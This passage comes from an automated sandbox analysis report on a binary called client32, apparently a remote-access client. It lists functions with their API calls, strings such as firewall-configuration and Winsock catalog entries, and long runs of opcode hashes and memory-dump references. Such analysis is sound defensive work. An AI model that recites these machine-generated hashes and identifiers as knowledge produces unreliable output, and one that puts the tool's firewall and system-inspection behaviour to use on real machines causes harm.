                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue_memsetwsprintf
                                                                                • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                • API String ID: 1333399081-1346142259
                                                                                • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                • String ID: bad cast
                                                                                • API String ID: 2427920155-3145022300
                                                                                • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                • API String ID: 3494822531-1878648853
                                                                                • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                Function 1102A6D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsJPIK.PCICHEK(1B702977,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free_malloc_memsetwsprintf
                                                                                • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                                • API String ID: 2814900446-469156069
                                                                                • Opcode ID: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                                • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                                • Opcode Fuzzy Hash: 6b90f5a91e0e8404fc851c8f10d2236098875013011e5de61ca2dd828f746a24
                                                                                • Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
                                                                                Function 110178F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 1101792C
                                                                                • CoInitialize.OLE32(00000000), ref: 11017935
                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                • CoUninitialize.COMBASE ref: 110179C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                • API String ID: 2407233060-578995875
                                                                                • Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                • Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
                                                                                • Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
                                                                                • Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
                                                                                Function 11017810 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 11017842
                                                                                • CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                • CoUninitialize.COMBASE ref: 110178D0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                • API String ID: 2407233060-2037925671
                                                                                • Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                • Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
                                                                                • Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
                                                                                • Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
                                                                                Function 11139600 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • Client, xrefs: 11139655
                                                                                • AutoICFConfig, xrefs: 11139650
                                                                                • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
                                                                                • DoICFConfig() OK, xrefs: 111396D6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                • API String ID: 536389180-1512301160
                                                                                • Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                • Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
                                                                                • Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
                                                                                • Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                Function 11096D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                • API String ID: 3222248624-258972079
                                                                                • Opcode ID: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                • Instruction ID: 9199824aa3bd6ebf99e58618a68c234682766c17c5e3bd8f83aabb27c1d0aea9
                                                                                • Opcode Fuzzy Hash: 2f37d598b4012c0c7ec1fc3c7a41f1831d77099e3c9549bb0708a0a7a71d465f
                                                                                • Instruction Fuzzy Hash: BC11C235F4111DABC700EFA59C84EEFFF789F44705B500468E51ADB104EA25A980C7E1
                                                                                Function 110262F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                • API String ID: 4186647306-532032230
                                                                                • Opcode ID: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                • Instruction ID: 183e1746e0b9fc2934bd9ec846e99aaf72a90bbb460a81bb2001b4ad07131d97
                                                                                • Opcode Fuzzy Hash: 168c0276823b5447779d0ea544bca84f700d76740b4f854a777d5a44096f3b0a
                                                                                • Instruction Fuzzy Hash: BE012D72A41319ABE720DEA5EC44F4BB7E8EB88765F40452AF955D7600D630E8048BA0
                                                                                Function 11110040 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,776CC3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                • CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                • API String ID: 3360349984-1136101629
                                                                                • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                                • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                                • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                Function 11032020 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
